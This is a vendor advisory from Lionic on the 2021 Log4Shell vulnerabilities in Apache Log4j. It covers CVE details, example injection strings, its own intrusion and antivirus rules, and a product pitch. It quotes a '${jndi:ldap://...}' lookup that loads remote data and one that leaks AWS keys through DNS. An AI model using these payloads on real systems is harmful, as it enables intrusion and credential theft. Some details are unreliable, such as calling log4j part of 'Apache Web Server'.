Hsinchu, Taiwan – Dec 19, 2021 – One of the Apache Log4shell Vulnerabilities has the CVSS score as 10. The full score of CVSS is 10 and thus this is the highest level critical. Its name is CVE-2021-44228 and means that the JNDI feature of Apache Web Server used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. Apache organization fixed it and released log4j2 version 2.15.
Again, CVE-2021-45046 is found in version 2.15 soon and therefore version 2.16 is released.
Again, CVE-2021-45105 is found in version 2.16 soon and therefore version 2.17 is released.
Again, CVE-2021-44832 is found in version 2.17 soon and therefore version 2.17.1 is released.
Also, CVE-2021-4104 is the vulnerability in log4j version 1.2. Although log4j version 1 is end of life already, some people may still use it and not upgrade to version 2.
CVE-2021-44228, CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105 have some other names like log4j, log4j2, log4shell and so on. Actually log4j and log4j2 are the very popular logging tools maintained by Apache organization for sending text to be stored in log files and/or databases. The log4j (version 1) is end of life and log4j2 (version 2) is the latest. Log4shell is the more precise name for these vulnerabilities because cyber-criminals can execute remote code easily with those vulnerabilities. Whether you are using log4j version 1 or 2, you are strongly recommended to adopt the latest version of log4j2 for security reasons. At the time of writing, the version 2.17.1 is the latest version.
Update: The CVSS score of CVE-2021-45046 is adjusted from 3.7 to 9 on Dec 17, 2021. And another CVE-2021-45105 is found that it can be used in DoS (Denial of Service) attack.
Update2: CVE-2021-44832 is found after log4j 2.17 is released. Therefore the log4j 2.17.1 arrives soon.
CVE Id | CVE Description | CVSS v3 Score | Severity Level | Affected log4j Versions |
---|---|---|---|---|
CVE-2021-44228 | JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. | 10.0 | Critical | Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 |
CVE-2021-44832 | This explot allows remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. | 6.8 | Moderate | Log4j2 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4 |
CVE-2021-45046 | It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. | 9.0 | Critical | Log4j2 2.15 only |
CVE-2021-45105 | Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. | 7.5 | High | Log4j2 versions 2.0-alpha1 through 2.16. |
CVE-2021-4104 | JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. | N/A | N/A | Log4j 1.2 only. |
According to the technical report of Rapid7, many cyber-criminals in the world begin using these vulnerabilities since November, 2021.
Log4shell Behavior
CVE-2021-44228 allows an attacker to craft an LDAP request that can retrieve and run payloads on a vulnerable host. In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form “${prefix:name}”. The example is “${jndi:ldap://example.com/file}” will load data from “ldap://example.com/file” if connected to the Internet and cyber-criminal has prepared a malicious LDAP server at “example.com”.
This vulnerability also allows information leakage where the attacker can read and show data from files and environment variables on the vulnerable host using an LDAP request. Such LDAP requests can generate a DNS request leaking sensitive information for applications such as AWS, Hadoop, Postgres etc.
An example of the format of a JNDI lookup that generates an LDAP request resulting in a DNS request leaking the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY values:
${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.
There are a lot of real examples about log4shell. The first one is the YouTube video of cracking the popular Minecraft game via Log4shell vulnerability from IKteam. And the second one is the cracked Tesla car via Log4shell vulnerability from ExploitWareLabs.
Lionic’s Anti-Intrusion and Anti-Virus rules for Log4shell Vulnerabilities
Again, Lionic studied the log4shell vulnerabilities immediately and released related signature. Both Anti-Intrusion and Anti-Virus signature databases have some rules which can defend against the log4shell vulnerabilities. All Lionic security technology based products can protect against log4shell vulnerabilities after their signatures are updated to the latest version.
The following two YouTube videos prove that Lionic Pico-UTM can block the log4shell vulnerabilities.
Partial list of Anti-Intrusion rules for Log4shell Vulnerabilities:
Rule ID | Description |
---|---|
8100903 ~ 8100908 | Apache Log4j JNDI Injection Remote Code Execution attempt |
… | … |
Partial list of Anti-Virus rules for Log4shell Vulnerabilities:
Rule ID | Virus Name | Release Date |
---|---|---|
9114807219854095 | Trojan.HTML.Generic.4 | 2021-12-16 |
9093020794585558 | Trojan.Java.Agent.4 | 2021-12-16 |
9189618224015584 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9235690281452323 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9008999622847201 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9191827434065719 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9033340405765520 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9067928544323220 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9146325989646571 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9259682338799974 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9014239844713955 | Trojan.ZIP.Zojfor.4 | 2021-12-16 |
9119691314816421 | Trojan.Java.Agent.3 | 2021-12-16 |
9040875976256033 | Trojan.Java.Agent.4 | 2021-12-15 |
9242430171087494 | Trojan.Script.Generic.4 | 2021-12-15 |
9211518412509961 | Riskware.ZIP.Generic.1 | 2021-12-15 |
9159737756054731 | Trojan.Script.Generic.4 | 2021-12-14 |
9046580433934920 | Trojan.Script.Zojfor.4 | 2021-12-14 |
9151855514369988 | Trojan.Script.Zojfor.4 | 2021-12-14 |
… | … | … |
Conclusion
Plenty of companies adopted Apache Web Server, Tomcat and are running many Java programs. Undoubtedly they are also using log4j2 as the logging tool. Therefore, many big companies like Amazon AWS, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, Cisco, NetApp and others issued the log4shell warnings to their customers. The companies adopted log4j2 are strongly recommended to upgrade their log4j2 to latest version for defending against CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105 and CVE-2021-4104. This is the best method for pulling the plug.
However, if network administrators are tired of fixing the endless stream of cybersecurity vulnerabilities, they can use the Lionic Pico-UTM as the “Virtual Bug Fix”. The administrators can take their time to wait the stable version and then upgrade. Also, please note that some security network appliances have Anti-Intrusion feature only and no Anti-virus feature. Both the Anti-Intrusion rules and Anti-Virus rules released by Lionic proved that only Anti-Intrusion feature is not enough for protection once again.
References:
- Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
- CVE-2021-44228, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
- CVE-2021-44228, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832
- CVE-2021-45046, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
- CVE-2021-45105, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
- CVE-2021-4104, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104
- Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns, https://blogs.juniper.net/en-us/security/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
- Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations, https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/
- The Every person’s Guide to Log4Shell, (CVE-2021-44228), https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/
- ExploitWareLabs, https://www.facebook.com/ExWareLabs
- Log4Shell, https://en.wikipedia.org/wiki/Log4Shell
- Apache Log4j Security Vulnerabilities, https://logging.apache.org/log4j/2.x/security.html
About Lionic Corporation
Lionic Corporation is a worldwide provider of innovative Deep Packet Inspection solutions. The technologies of Lionic include the complete DPI-based software engine and related management software which offer the Security Solutions that addresses anti-virus, anti-intrusion, anti-webthreat; and the Content Management Solutions that addresses application identification, device identification, application based QoS, web content filtering, parental control.
Lionic’s security and content management solutions, cloud-based scan services and signature subscription service are widely deployed in the world already. They help service providers, network appliance manufacturers, semiconductor companies, etc. to enable the next generation of business routers, residential gateways, SD WAN edges and cloud gateways, advanced firewalls, UTMs, Smart NICs and mobile devices. Those products powered by Lionic provide better network management and protect the world’s networks from an ever increasing level of security threats.